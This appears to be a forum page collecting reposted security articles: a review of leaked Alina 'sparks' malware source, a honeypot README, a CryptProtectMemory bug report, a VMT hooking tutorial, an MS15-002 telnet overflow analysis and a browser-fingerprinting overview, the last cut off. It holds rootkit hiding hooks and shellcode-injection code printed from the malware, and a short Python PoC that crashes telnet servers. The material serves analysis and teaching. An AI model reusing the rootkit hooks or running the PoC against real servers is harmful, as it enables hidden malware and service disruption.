I got on my hands recently the source code of Alina "sparks", the main 'improvement' that everyone is talking about and make the price of this malware rise is the rootkit feature. Josh Grunzweig did already an interesting coverage of a sample, but what worth this new version ? InjectedDLL.c from the source is a Chinese copy-paste of ring3?Hook NtQueryDirectoryFile???? - ?sir - ??? and commented out, replaced with two kernel32 hooks instead, like if the author cannot into hooks a comment is still in Chinese as you can see on the screenshot. + this: [FONT=monospace] LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName,LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData) { LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData); if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0) { Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData); } return Result; } ... // Registry Value Hiding Win32HookAPI("advapi32.dll", "RegEnumValueA", (void *) RegEnumValueAHook, (void *) &RegEnumValueANext); Win32HookAPI("advapi32.dll", "RegEnumValueW", (void *) RegEnumValueWHook, (void *) &RegEnumValueWNext);[/FONT] So many stupid mistakes in the code, no sanity checks in hooks, nothing stable. Haven't looked at a sample in the wild but i doubt it work anyhow. Actual rootkit source (body stored as hex array in RootkitDriver.inc c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap. This x86-32 driver is responsible for NtQuerySystemInformation, NtEnumerateValueKey, NtQueryDirectoryFile SSDT hooking. Driver is ridiculously simple: [FONT=monospace] NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { DriverObject->DriverUnload = (PDRIVER_UNLOAD)UnloadProc; BuildMdlForSSDT(); InitStrings(); SetHooks(); return STATUS_SUCCESS; }[/FONT] [FONT=monospace] BOOL SetHooks() { if ( !NtQuerySystemInformationOrig ) NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook); if ( !NtEnumerateValueKeyOrig ) NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook); if ( !NtQueryDirectoryFileOrig ) NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook); return TRUE; }[/FONT] All of them hide 'windefender' target process, file, registry. [FONT=monospace] void InitStrings() { RtlInitUnicodeString((PUNICODE_STRING)&WindefenderProcessString, L"windefender.exe"); RtlInitUnicodeString(&WindefenderFileString, L"windefender.exe"); RtlInitUnicodeString(&WindefenderRegistryString, L"windefender"); }[/FONT] It's the malware name, Josh pointed also in this direction on his analysis. First submitted on VT the 2013-10-17 17:27:10 UTC ( 1 year, 2 months ago ) https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/ Overall that dll seems unusued, alina project uses driver i mentioned. As for project itself, it's still an awful piece of students lab work, here is some log just from attempt to compile: source\grab\base.cpp(78) If SHGetSpecialFolderPath returns FALSE, strcat to SourceFilePath will be used anyway. Two copy-pasted methods with same mistake: source\grab\base.cpp(298) source\grab\base.cpp(433) Leaking process information handle pi.hProcess. Using hKey from failed function call: [FONT=monospace] source\grab\base.cpp(316): if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0L, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) { RegCloseKey(hKey); [/FONT] pThread could be NULL, this is checked only in WriteProcessMemory but not in CreateRemoteThread: [FONT=monospace] source\grab\monitoringthread.cpp(110): LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &BytesWritten); HANDLE ThreadHandle = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &TID);[/FONT] Where hwid declared as char hwid[8]; Reading invalid data from hdr->hwid: the readable size is 8 bytes, but 18 bytes may be read: source\grab\panelrequest.cpp(73): memcpy(outkey, hdr->hwid, 18); Realloc might return null pointer: assigning null pointer to buf, which is passed as an argument to realloc, will cause the original memory block to be leaked: source\grab\panelrequest.cpp(173) The prior call to strncpy might not zero-terminate string Result: source\grab\scanner.cpp(159) Return value of ReadFile ignored. If it will fail anywhere code will be corrupted as cmd variable is not initialized: source\grab\watcher.cpp(61) source\grab\watcher.cpp(64) source\grab\watcher.cpp(71) Signed unsigned mismatch: source\grab\rootkitinstaller.cpp(47) Unreferenced local variable hResult: source\grab\base.cpp(158) Using TerminateThread does not allow proper thread clean up: source\grab\watcher.cpp(125) Now related to 'editions' sparks have some, for examples the pipes, mutexes, user-agents, process black-list but most of these editions are minors things that anybody can do to 'customise' his own bot. In any case that can count as a code addition or something 'new' For the panel... well it's like the bot, nothing changed at all. It's still the same ugly design, still the same files with same modifications timestamp, no code addition, still the same cookie auth crap like if the coder can't use session in php and so on... To conclude, the main improvement is a copy/pasted rootkit who don't work, i don't know how many bad guys bought this source for 1k or more but that definitely not worth it. Overall it's a good example of how people can take a code, announce a rootkit to impress and play everything on malware notoriety. This remind me the guys who announced IceIX on malware forums and finally the samples was just a basic ZeuS with broken improvements. Hi Benson. Posted by Steven K at 00:07 Sursa: http://www.xylibox.com/2015/01/alina-sparks-source-code-review.html
-
[h=1]About[/h] Mailoney is a SMTP Honeypot I wrote just to have fun learning Python. The Open Relay module emulates an Open Relay and writes attempted emails to a log file. Similarly, the Authentication modules will capture credentials and write those to a log file. [h=1][/h][h=1]Usage[/h] You'll likely need to run this with elevated permissions as required to open sockets on special ports. python mailoney.py -s mailbox <options> -h, --help Show this help message and exit -i <ip address> The IP address to listen on (defaults to localhost) -p <port> The port to listen on (defaults to 25) -s mailserver This will generate a fake hostname -t <type> HoneyPot type open_relay Emulates an open relay postfix_creds Emulates PostFix authentication server, collects credentials examples: python mailoney.py -s mailbox -i 10.10.10.1 -p 990 -t postfix_creds [h=1][/h][h=1]ToDo[/h] Add modules for EXIM, Microsoft, others Build in Error Handling Add a Daemon flag to background process. Sursa: https://github.com/awhitehatter/mailoney
-
- 1
-
-
Windows: Impersonation Check Bypass With CryptProtectMemory and CRYPTPROTECTMEMORY_SAME_LOGON flag Reported by fors.. @google.com, Oct 17, 2014 Platform: Windows 7, 8.1 Update 32/64 bit Class: Security Bypass/Information Disclosure The function CryptProtectMemory allows an application to encrypt memory for one of three scenarios, process, logon session and computer. When using the logon session option (CRYPTPROTECTMEMORY_SAME_LOGON flag) the encryption key is generated based on the logon session identifier, this is for sharing memory between processes running within the same logon. As this might also be used for sending data from one process to another it supports extracting the logon session id from the impersonation token. The issue is the implementation in CNG.sys doesn't check the impersonation level of the token when capturing the logon session id (using SeQueryAuthenticationIdToken) so a normal user can impersonate at Identification level and decrypt or encrypt data for that logon session. This might be an issue if there's a service which is vulnerable to a named pipe planting attack or is storing encrypted data in a world readable shared memory section. This behaviour of course might be design, however not having been party to the design it's hard to tell. The documentation states that the user must impersonate the client, which I read to mean it should be able to act on behalf of the client rather than identify as the client. Attached is a simple PoC which demonstrates the issue. To reproduce follow the steps. 1) Execute Poc_CNGLogonSessionImpersonation.exe from the command line 2) The program should print "Encryption doesn't match" to indicate that the two encryptions of the same data was not a match, implying the key was different between them. Expected Result: Both calls should return the same encrypt data, or the second call should fail Observed Result: Both calls succeed and return different encrypted data This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. [TABLE] [TR] [TD] [/TD] [TD] Poc_CNGLogonSessionImpersonation.zip 62.4 KB Download[/TD] [/TR] [/TABLE] Sursa: https://code.google.com/p/google-security-research/issues/detail?id=128
-
[h=1]CodeInspect says “Hello World”: A new Reverse-Engineering Tool for Android and Java Bytecode[/h] Posted on 2014/12/26 by Siegfried Rasthofer We are very happy to announce a new tool in our toolchain: CodeInspect - A Jimple-based Reverse-Engineering framework for Android and Java applications. Developing an Android application in an IDE is very convenient since features like code completion, “Open Declaration“, renaming variables, searching files etc. help the developer a lot. Especially code-debugging is a very important feature in IDEs. Usually, all those features are available for the source code and not for the bytecode, since they support the developer not a reverse-engineer. Well, but all those features would be be also very helpful for reverse-engineering Android or Java applications. This is the reason why we came up with a new reverse-engineering framework that works on the intermediate representation Jimple and supports all the features above and a lot more. In the following we give a detailed description about CodeInspect and its features. CodeInspect supports as input format a complete Android Application Package (apk), just the Android bytecode (dex-file) or a jar-file. In the following we will describe the different features based on a malicious Android apk. [h=1]Framework Overview[/h] The figure above is a screenshot of CodeInspect. As one can see, CodeInspect is based on the Eclipse RCP framework. One can define a workspace with different projects (apks). Furthermore, CodeInspect contains different perspectives, different views and a new editor for the intermediate representation. The main perspectives are the “CodeInspect” perspective as shown in the screenshot and the “Debug” perspective which is known from the general Eclipse IDE including views for “Expressions”, “Breakpoints” and “Variables”. Other basic views in the CodeInspect perspective are: Project Explorer: It shows all the important files in a readable format of an apk Outline: Shows all the fields and methods of a specific class. By clicking on an item, one directly jumps to the corresponding line in code. Console: Shows the console output. Problems: Shows all the warning and errors (e.g., compilation errors) that occur in the project. Sursa: CodeInspect says “Hello World”: A new Reverse-Engineering Tool for Android and Java Bytecode | Secure Software Engineering
-
Virtual Method Table (VMT) Hooking
Nytro posted a topic in Reverse engineering & exploit development
Virtual Method Table (VMT) Hooking Posted on January 15, 2015 by admin This post will cover the topic of hooking a classes’ virtual method table. This is a useful technique that has many applications, but is most commonly seen in developing game hacks. For example, employing VMT hooking of objects in a Direct3D/OpenGL graphics engine is how in-game overlays are displayed. Virtual Method Tables (or vtables) Usage of VMTs, in the context of C++ for this post, is how polymorphism is implemented at the language level. Internally, the VMT is represented as an array of function pointers, and typically resides at the beginning or end of the memory layout of the object. Whenever a C++ class declares a virtual function, the compiler will add an entry in to the VMT for it. If a class inherits from a base object and overrides a base virtual function, then the pointer to the overriden function will be present in the derived objects VMT. For example, take the following code, compiled with the VS 2013 compiler on an x86 system: [TABLE] [TR] [TD=class: code]class Base { public: Base() { printf("- Base::Base\n"); } virtual ~Base() { printf("- Base::~Base\n"); } void A() { printf("- Base::A\n"); } virtual void B() { printf("- Base:\n"); } virtual void C() { printf("- Base::C\n"); } }; class Derived final : public Base { public: Derived() { printf("- Derived::Derived\n"); } ~Derived() { printf("- Derived::~Derived\n"); } void B() override { printf("- Derived:\n"); } void C() override { printf("- Derived::C\n"); } };[/TD] [/TR] [/TABLE] with the instances of Base and Derived created as follows: [TABLE] [TR] [TD=class: code]Base base; Derived derived; Base *pBase = new Derived;[/TD] [/TR] [/TABLE] The class Base has three virtual functions: ~Base, B, and C. The class Derived, which inherits from Base overrides the two virtual functions B and C. In memory, the VMT for Base will contain ~Base, B, and C, as can be inspected with the debugger: while the VMT for the two Derived instances contain ~Derived, B, and C, but with different addresses for each than the ones in Base (see below). So how are these actually used? Take, for example, a function that takes a pointer to a Base instance and invokes the functions A, B, and C, on it: [TABLE] [TR] [TD=class: code]void Invoke(Base * const pBase) { pBase->A(); pBase->B(); pBase->C(); }[/TD] [/TR] [/TABLE] and is invoked in the following manner: [TABLE] [TR] [TD=class: code] Invoke(&base); Invoke(&derived); Invoke(pBase);[/TD] [/TR] [/TABLE] The Invoke function disassembled for x86 is as follows: pBase->A(); 004012C9 8B 4D 08 mov ecx,dword ptr [pBase] 004012CC E8 8F FE FF FF call Base::A (0401160h) pBase->B(); 004012D1 8B 45 08 mov eax,dword ptr [pBase] 004012D4 8B 10 mov edx,dword ptr [eax] 004012D6 8B 4D 08 mov ecx,dword ptr [pBase] 004012D9 8B 42 04 mov eax,dword ptr [edx+4] 004012DC FF D0 call eax pBase->C(); 004012DE 8B 45 08 mov eax,dword ptr [pBase] 004012E1 8B 10 mov edx,dword ptr [eax] 004012E3 8B 4D 08 mov ecx,dword ptr [pBase] 004012E6 8B 42 08 mov eax,dword ptr [edx+8] 004012E9 FF D0 call eax This disassembly shows exactly what is going on under the hood with relation to polymorphism. For the invocations to B and C, the compiler moves the address of the object in to the EAX register. This is then dereferenced to get the base of the VMT and stored in the EDX register. The appropriate VMT entry for the function is found by using EDX as an index and storing the address in EAX. This function is then called. Since Base and Derived have different VMTs, this code will call different functions — the appropriate ones — for the appropriate object type. Seeing how it’s done under the hood also allows us to easily write a function to print the VMT. [TABLE] [TR] [TD=class: code]void PrintVTable(Base * const pBase) { unsigned int *pVTableBase = (unsigned int *)(*(unsigned int *)pBase); printf("First: %p\n" "Second: %p\n" "Third: %p\n", *pVTableBase, *(pVTableBase + 1), *(pVTableBase + 2)); }[/TD] [/TR] [/TABLE] Hooking the VMT Knowing the layout of the VMT makes it trivial to hook. To accomplish this, all that is needed is to overwrite the entry in the VMT with the address of the desired hook function. This is done by using the VirtualProtect function to set the appropriate memory permissions alongside with memcpy to write in the desired hook address. Note that memcpy is used since everything resides within the same address space, otherwise WriteProcessMemory would have to be used. A hooking routine might look like the following: [TABLE] [TR] [TD=class: code]void HookVMT(Base * const pBase) { unsigned int *pVTableBase = (unsigned int *)(*(unsigned int *)pBase); unsigned int *pVTableFnc = (unsigned int *)((pVTableBase + 1)); void *pHookFnc = (void *)VMTHookFnc; SIZE_T ulOldProtect = 0; (void)VirtualProtect(pVTableFnc, sizeof(void *), PAGE_EXECUTE_READWRITE, &ulOldProtect); memcpy(pVTableFnc, &pHookFnc, sizeof(void *)); (void)VirtualProtect(pVTableFnc, sizeof(void *), ulOldProtect, &ulOldProtect); }[/TD] [/TR] [/TABLE] and VMTHook having a simple definition of [TABLE] [TR] [TD=class: code]void __fastcall VMTHookFnc(void *pEcx, void *pEdx) { Base *pThisPtr = (Base *)pEcx; printf("In VMTHookFnc\n"); }[/TD] [/TR] [/TABLE] Here the fastcall calling convention is used to easily retrieve the this pointer, which is typically stored in the ECX register. Applications The application of this technique will show how to hook IDXGISwapChain::Present and allow for rendering/overlaying of text on a Direct3D10 application. This is not the only way to overlay text, nor necessarily the best, but still provides an adequate example to illustrate the point. The target application will be a Direct3D10 sample provided by the June 2010 DirectX SDK. See /Samples/C++/Direct3D10/Tutorials/Tutorial01 in the SDK. The sample application initializes the Direct3D device and swap chain with a call to D3D10CreateDeviceAndSwapChain then simply sets up a view and renders a blue background on the window (screenshot below). To overlay text on a Direct3D application, the IDXGISwapChain object must be obtained. Then the Present function of the interface must be hooked, since that is the function responsible for showing the rendered image to the user. This is done here by hooking D3D10CreateDeviceAndSwapChain. Once this function is hooked, the hook will call the real D3D10CreateDeviceAndSwapChain function in order to set up the IDXGISwapChain interface. Then the VMT entry for Present will be replaced with a hooked version that renders text. Put into code it looks like the following: [TABLE] [TR] [TD=class: code]HRESULT WINAPI D3D10CreateDeviceAndSwapChainHook(IDXGIAdapter *pAdapter, D3D10_DRIVER_TYPE DriverType, HMODULE Software, UINT Flags, UINT SDKVersion, DXGI_SWAP_CHAIN_DESC *pSwapChainDesc, IDXGISwapChain **ppSwapChain, ID3D10Device **ppDevice) { printf("In D3D10CreateDeviceAndSwapChainHook\n"); //Create the device and swap chain HRESULT hResult = pD3D10CreateDeviceAndSwapChain(pAdapter, DriverType, Software, Flags, SDKVersion, pSwapChainDesc, ppSwapChain, ppDevice); //Save the device and swap chain interface. //These aren't used in this example but are generally nice to have addresses to if(ppSwapChain == NULL) { printf("Swap chain is NULL.\n"); return hResult; } else { pSwapChain = *ppSwapChain; } if(ppDevice == NULL) { printf("Device is NULL.\n"); return hResult; } else { pDevice = *ppDevice; } //Get the vtable address of the swap chain's Present function and modify it with our own. //Save it to return to later in our Present hook if(pSwapChain != NULL) { DWORD_PTR *SwapChainVTable = (DWORD_PTR *)pSwapChain; SwapChainVTable = (DWORD_PTR *)SwapChainVTable[0]; printf("Swap chain VTable: %X\n", SwapChainVTable); PresentAddress = (pPresent)SwapChainVTable[8]; printf("Present address: %X\n", PresentAddress); DWORD OldProtections = 0; VirtualProtect(&SwapChainVTable[8], sizeof(DWORD_PTR), PAGE_EXECUTE_READWRITE, &OldProtections); SwapChainVTable[8] = (DWORD_PTR)PresentHook; VirtualProtect(&SwapChainVTable[8], sizeof(DWORD_PTR), OldProtections, &OldProtections); } //Create the font that we will be drawing with CreateDrawingFont(); return hResult; }[/TD] [/TR] [/TABLE] CreateDrawingFont simply sets up a ID3DX10Font to draw with. Now since the VMT entry was replaced, PresentHook will be invoked instead of Present. Here is where the drawing can be done. [TABLE] [TR] [TD=class: code]HRESULT WINAPI PresentHook(IDXGISwapChain *thisAddr, UINT SyncInterval, UINT Flags) { //printf("In Present (%X)\n", PresentAddress); RECT Rect = { 100, 100, 200, 200 }; pFont->DrawTextW(NULL, L"Hello, World!", -1, &Rect, DT_CENTER | DT_NOCLIP, RED); return PresentAddress(thisAddr, SyncInterval, Flags); }[/TD] [/TR] [/TABLE] I chose a different calling convention here than for the earlier example code, but everything still functions the same. The end result shows the Present hook successfully rendering the text: A few important caveats about doing it this way: The hook must be installed prior to the call to D3D10CreateDeviceAndSwapChain. Otherwise handles to the device and swap chain won’t be obtained. ID3DX10Font::DrawText can mess with the blend states, shaders, rasterizer, etc. Overlaying text on an application that makes use of these requires the hook developer to account for this and save/restore the states properly. The source code for the VMT hook example, the slightly modified Direct3D10 sample application, and the Direct3D10 hook can be found here. The hook uses Microsoft Detours as a dependency to perform the initial hooking of D3D10CreateDeviceAndSwapChain. Sursa: http://www.codereversing.com/blog/?p=181 -
2015/01/16 9:09 | cssembly | binary security , vulnerability analysis | accounting for a seat first | donate author 0x00 principle vulnerability analysis MS15-002 is Microsoft telnet service buffer overflow vulnerability, the following principles to analyze and construct its POC. telnet service process for tlntsvr.exe, for each client connection will start executing a corresponding tlntsess.exe process is tlntsess.exe patched files through a patch over right, identify vulnerabilities position follows function [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2) [/TD] [/TR] [/TABLE] Patch before, this function are: After the patch, the function is: That turned a buffer into two, calling finish [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2,&v13,&v9,v6)[/TD] [/TR] [/TABLE] After the first data to judge the length of the buffer, if [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](unsigned int)(v9 - (unsigned __int8 *)&Src - 1) <= 0x7FE [/TD] [/TR] [/TABLE] It is determined that the target buffer can accommodate the number of characters, if [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](unsigned int)((char *)v14 + v7 - (_DWORD)&Dst) >= 0x800[/TD] [/TR] [/TABLE] Exit, else [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]memcpy_s(v14, (char *)&v18 - (_BYTE *)v14, &Src, v9 - (unsigned __int8 *)&Src)[/TD] [/TR] [/TABLE] Copy data to Dst buffer. The front patch, only one buffer, call [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)[/TD] [/TR] [/TABLE] Before the first data buffer length determination, v13 only when - & Src <= 2048 when calling, v13 point available buffer head, and [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](*(&off_1011008 + 3 * v7))(v3, &v14, &v13, *v6)[/TD] [/TR] [/TABLE] Function of the call, the value v13 will be modified, if the call [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]void __thiscall CRFCProtocol::DoTxBinary(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD] [/TR] [/TABLE] Function, you can see the function changes the value of the parameter 3, that * a3 + = 3. After analysis can know if v13 - & Src = 2047, then meet v13 - & Src <= 2048 condition, then if (* (& off_1011008 + 3 * v7)) (v3, & v14, & v13, * v6) call is CRFCProtocol: : DoTxBinary function and perform the following sequence of instructions, apparently led to a buffer overflow. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6[/TD] [TD=class: code]v7 = *a3; *v7 = -1; v7[1] = -3; v7[2] = a4; v7[3] = 0; *a3 += 3;[/TD] [/TR] [/TABLE] Patched version, using two buffers, the temporary buffer pointer passed to v9 [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code](*(void (__thiscall **)(CRFCProtocol *, unsigned __int8 **, unsigned __int8 **, unsigned __int8))((char *)&off_1011008 + v12))(v2,&v13,&v9,v6) [/TD] [/TR] [/TABLE] After the function returns the data to determine the length of the buffer pointed v9, and finally determine whether the destination buffer space available to accommodate the remaining data in the buffer pointed v9, namely (unsigned int) ((char *) v14 + v7 - ( _DWORD) & Dst)> = 0x800 judgment. 0x01 environment to build and construct POC Win7 install and start the telnet server, perform net user exp 123456 / ADD increase user exp, via net localgroup TelnetClients exp / ADD TelnetClients add the user to the group, so that you can log in through a telnet client. Debugging found [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket(CRFCProtocol *this, unsigned __int32 *a2)[/TD] [/TR] [/TABLE] In a2 for the received data length, up to 0x400, v6 point the received data, apparently in order to trigger the overflow must be called ((& off_1011008 + 3 * v7)) (v3, & v14, & v13, * v6), the let the data arising from expansion, to ensure data processing after the Src buffer length is greater than 0x800. View (* (& off_1011008 + 3 * v7)) (v3, & v14, & v13, * v6) of the function can be called, [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]void __thiscall CRFCProtocol::AreYouThere(CRFCProtocol *this, unsigned __int8 **a2, unsigned __int8 **a3, unsigned __int8 a4)[/TD] [/TR] [/TABLE] Will obviously result in data expansion, a4 is the received data in a byte, after execution, a3 will be written into the buffer pointed to 9 bytes of fixed data. By wireshark cut package, simply for protocol analysis, construction POC follows, let the program repeatedly CRFCProtocol :: AreYouThere function and eventually trigger an exception. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8[/TD] [TD=class: code]import socket address = ('192.168.172.152', 23) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(address) data = "\xff\xf6" * 0x200 s.send(data) s.recv(512) s.close()[/TD] [/TR] [/TABLE] Run poc, in [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]signed int __thiscall CRFCProtocol::ProcessDataReceivedOnSocket( CRFCProtocol *this, unsigned __int32 *a2)[/TD] [/TR] [/TABLE] Set a breakpoint, you can see after the break a2 = 0x400, (DWORD) ((DWORD *) (this + 0x1E40) + 0x16c8) point to get the data received. Set a breakpoint before the function returns, after the execution, you can see __security_check_cookie detected a stack overflow, triggering an exception, break into the debugger. Disclaimer: Prohibit unauthorized reproduced cssembly @ clouds Knowledge SursaL https://translate.google.com/translate?sl=auto&tl=en&js=y&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F4621&edit-text=
-
Technical analysis of client identification mechanisms Written by Artur Janc <aaj@google.com> and Michal Zalewski <lcamtuf@google.com> In common use, the term “web tracking” refers to the process of calculating or assigning unique and reasonably stable identifiers to each browser that visits a website. In most cases, this is done for the purpose of correlating future visits from the same person or machine with historical data. Some uses of such tracking techniques are well established and commonplace. For example, they are frequently employed to tell real users from malicious bots, to make it harder for attackers to gain access to compromised accounts, or to store user preferences on a website. In the same vein, the online advertising industry has used cookies as the primary client identification technology since the mid-1990s. Other practices may be less known, may not necessarily map to existing browser controls, and may be impossible or difficult to detect. Many of them - in particular, various methods of client fingerprinting - have garnered concerns from software vendors, standards bodies, and the media. To guide us in improving the range of existing browser controls and to highlight the potential pitfalls when designing new web APIs, we decided to prepare a technical overview of known tracking and fingerprinting vectors available in the browser. Note that we describe these vectors, but do not wish this document to be interpreted as a broad invitation to their use. Website owners should keep in mind that any single tracking technique may be conceivably seen as inappropriate, depending on user expectations and other complex factors beyond the scope of this doc. We divided the methods discussed on this page into several categories: explicitly assigned client-side identifiers, such as HTTP cookies; inherent client device characteristics that identify a particular machine; and measurable user behaviors and preferences that may reveal the identity of the person behind the keyboard (or touchscreen). After reviewing the known tracking and fingerprinting techniques, we also discuss potential directions for future work and summarize some of the challenges that browser and other software vendors would face trying to detect or prevent such behaviors on the Web. Contents 1 Explicitly assigned client-side identifiers 1.1 HTTP cookies 1.2 Flash LSOs 1.3 Silverlight Isolated Storage 1.4 HTML5 client-side storage mechanisms 1.5 Cached objects 1.6 Cache metadata: ETag and Last-Modified 1.7 HTML5 AppCache 1.8 Flash resource cache 1.9 SDCH dictionaries 1.10 Other script-accessible storage mechanisms 1.11 Lower-level protocol identifiers [*]2 Machine-specific characteristics 2.1 Browser-level fingerprints 2.2 Network configuration fingerprints [*]3 User-dependent behaviors and preferences [*]4 Fingerprinting prevention and detection challenges [*]5 Potential directions for future work Explicitly assigned client-side identifiers The canonical approach to identifying clients across HTTP requests is to store a unique, long-lived token on the client and to programmatically retrieve it on subsequent visits. Modern browsers offer a multitude of ways to achieve this goal, including but not limited to: Plain old HTTP cookies, Cookie-equivalent plugin features - most notably, Flash Local Shared Objects and Silverlight Isolated Storage, HTML5 client storage mechanisms, including localStorage, File, and IndexedDB APIs, Unique markers stored within locally cached resources or in cache metadata - e.g., Last-Modified and ETag, Fingerprints derived from browser-generated Origin-Bound Certificates for SSL connections, Bits encoded in HTTP Strict Transport Security pin lists across several attacker-controlled host names, Data encoded in SDCH compression dictionaries and dictionary metadata, ...and more. We believe that the availability of any one of these mechanisms is sufficient to reliably tag clients and identify them later on; in addition to this, many such identifiers can be deployed in a manner that conceals the uniqueness of the ID assigned to a particular client. On the flip side, browsers provide users with some degree of control over the behavior of at least some of these APIs, and with several exceptions discussed later on, the identifiers assigned in this fashion do not propagate to other browser profiles or to private browsing sessions. The remainder of this section provides a more in-depth overview of several notable examples of client tagging schemes that are within the reach of web apps. HTTP cookies HTTP cookies are the most familiar and best-understood method for persisting data on the client. In essence, any web server may issue unique identifiers to first-time visitors as a part of a HTTP response, and have the browser play back the stored values on all future requests to a particular site. All major browsers have for years been equipped with UIs for managing cookies; a large number of third-party cookie management and blocking software is available, too. In practice, however, external research has implied that only a minority of users regularly review or purge browser cookies. The reasons for this are probably complex, but one of them may be that the removal of cookies tends to be disruptive: contemporary browsers do not provide any heuristics to distinguish between the session cookies that are needed to access the sites the user is logged in, and the rest. Some browsers offer user-configurable restrictions on the ability for websites to set “third-party” cookies (that is, cookies coming from a domain other than the one currently displayed in the address bar - a behavior most commonly employed to serve online ads or other embedded content). It should be noted that the existing implementations of this setting will assign the “first-party” label to any cookies set by documents intentionally navigated to by the user, as well as to ones issued by content loaded by the browser as a part of full-page interstitials, HTTP redirects, or click-triggered pop-ups. Compared to most other mechanisms discussed below, overt use of HTTP cookies is fairly transparent to the user. That said, the mechanism may be used to tag clients without the use of cookie values that obviously resemble unique IDs. For example, client identifiers could be encoded as a combination of several seemingly innocuous and reasonable cookie names, or could be stored in metadata such as paths, domains, or cookie expiration times. Because of this, we are not aware of any means for a browser to reliably flag HTTP cookies employed to identify a specific client in this manner. Just as interestingly, the abundance of cookies means that an actor could even conceivably rely on the values set by others, rather than on any newly-issued identifiers that could be tracked directly to the party in question. We have seen this employed for some rich content ads, which are usually hosted in a single origin shared by all advertisers - or, less safely, are executed directly in the context of the page that embeds the ad. Flash LSOs Local Shared Objects are the canonical way to store client-side data within Adobe Flash. The mechanism is designed to be a direct counterpart to HTTP cookies, offering a convenient way to maintain session identifiers and other application state on a per-origin basis. In contrast to cookies, LSOs can be also used for structured storage of data other than short snippets of text, making such objects more difficult to inspect and analyze in a streamlined way. In the past, the behavior of LSOs within the Flash plugin had to be configured separately from any browser privacy settings, by visiting a lesser-known Flash Settings Manager UI hosted on macromedia.com (standalone installs of Flash 10.3 and above supplanted this with a Control Panel / System Preferences dialog available locally on the machine). Today, most browsers offer a degree of integration: for example, clearing cookies and other site data will generally also remove LSOs. On the flip side, more nuanced controls may not be synchronized: say, the specific setting for third-party cookies in the browser is not always reflected by the behavior of LSOs. From a purely technical standpoint, the use of Local Shared Objects in a manner similar to HTTP cookies is within the apparent design parameters for this API - but the reliance on LSOs to recreate deleted cookies or bypass browser cookie preferences has been subject to public scrutiny. Silverlight Isolated Storage Microsoft Silverlight is a widely-deployed applet framework bearing many similarities to Adobe Flash. The Silverlight equivalent of Flash LSOs is known as Isolated Storage. The privacy settings in Silverlight are typically not coupled to the underlying browser. In our testing, values stored in Isolated Storage survive clearing cache and site data in Chrome, Internet Explorer and Firefox. Perhaps more surprisingly, Isolated Storage also appears to be shared between all non-incognito browser windows and browser profiles installed on the same machine; this may have consequences for users who rely on separate browser instances to maintain distinct online identities. As with LSOs, reliance on Isolated Storage to store session identifiers and similar state information does not present issues from a purely technical standpoint. That said, given that the mechanism is not currently managed via browser controls, its use of for client identification is not commonplace and thus may be viewed as less transparent than standard cookies. HTML5 client-side storage mechanisms HTML5 introduces a range of structured data storage mechanisms on the client; this includes localStorage,the File API, and IndexedDB. Although semantically different from each other, all of them are designed to allow persistent storage of arbitrary blobs of binary data tied to a particular web origin. In contrast to cookies and LSOs, there are no significant size restrictions on the data stored with these APIs. In modern browsers, HTML5 storage is usually purged alongside other site data, but the mapping to browser settings isn’t necessarily obvious. For example, Firefox will retain localStorage data unless the user selects “offline website data” or “site preferences” in the deletion dialog and specifies the time range as “everything” (this is not the default). Another idiosyncrasy is the behavior of Internet Explorer,where the data is retained for the lifetime of a tab for any sites that are open at the time the operation takes place. Beyond that, the mechanisms do not always appear to follow the restrictions on persistence that apply to HTTP cookies. For example, in our testing, in Firefox, localStorage can be written and read in cross-domain frames even if third-party cookies are disabled. Due to the similarity of the design goals of 